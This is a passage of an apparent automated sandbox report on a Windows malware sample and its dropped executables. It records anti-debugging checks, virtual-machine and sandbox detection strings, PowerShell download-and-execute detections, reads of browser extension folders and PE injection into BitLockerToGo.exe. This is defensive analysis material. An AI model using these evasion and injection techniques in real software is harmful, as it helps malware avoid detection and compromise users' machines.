Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4140	Thread sleep count: 3147 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep count: 5431 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5212	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe TID: 6340	Thread sleep time: -180000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C49EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

2_2_6C49EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 4CAJNBDWED5ZLJ2B.exe, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2186782629.00000000007CB000.00000040.00000001.01000000.00000006.sdmp, ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe, 00000003.00000002.1957113414.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1996778153.00000000003A1000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000002.2000510881.00000000003A1000.00000040.00000001.01000000.0000000B.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2435239572.00000000004C3000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2429336947.00000000004C3000.00000040.00000001.01000000.00000017.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002A.00000001.2371456786.0000000000240000.00000040.00000001.01000000.00000019.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002A.00000002.2452077460.0000000000241000.00000040.00000001.01000000.00000019.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000002.2526413741.0000000000523000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: powershell.exe, 00000011.00000002.2313081100.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll $InputObject -as [int16]
Source: mshta.exe, 00000047.00000003.2547813817.0000028619CE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 0000002F.00000002.2461484643.0000000003469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\lkuV
Source: powershell.exe, 00000025.00000002.2410975543.0000000007940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw9N1
Source: mshta.exe, 00000032.00000003.2427272093.000001EC12C6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: mshta.exe, 00000047.00000003.2547813817.0000028619CE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685006729.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747879778.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1699159124.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: mshta.exe, 0000002D.00000003.2403474399.0000000002D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685006729.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747879778.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1699159124.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: powershell.exe, 00000025.00000002.2406846769.00000000078D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} qU
Source: powershell.exe, 0000002F.00000002.2532721254.0000000007C14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2186782629.00000000007CB000.00000040.00000001.01000000.00000006.sdmp, ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe, 00000003.00000002.1957113414.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1996778153.00000000003A1000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000002.2000510881.00000000003A1000.00000040.00000001.01000000.0000000B.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2435239572.00000000004C3000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2429336947.00000000004C3000.00000040.00000001.01000000.00000017.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002A.00000001.2371456786.0000000000240000.00000040.00000001.01000000.00000019.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002A.00000002.2452077460.0000000000241000.00000040.00000001.01000000.00000019.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000002.2526413741.0000000000523000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: mshta.exe, 0000000E.00000003.2237366292.000000000298B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe, 00000003.00000003.1898922257.000000000088A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: f2d6093d56.exe, 00000035.00000002.2845309052.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C56AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6C56AC62

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C56AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6C56AC62

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_8148.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3852.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_1284.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7864.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_6160.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7080.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6292.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 3844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6292, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Memory written: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D3C008
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000

Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe "C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe "C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
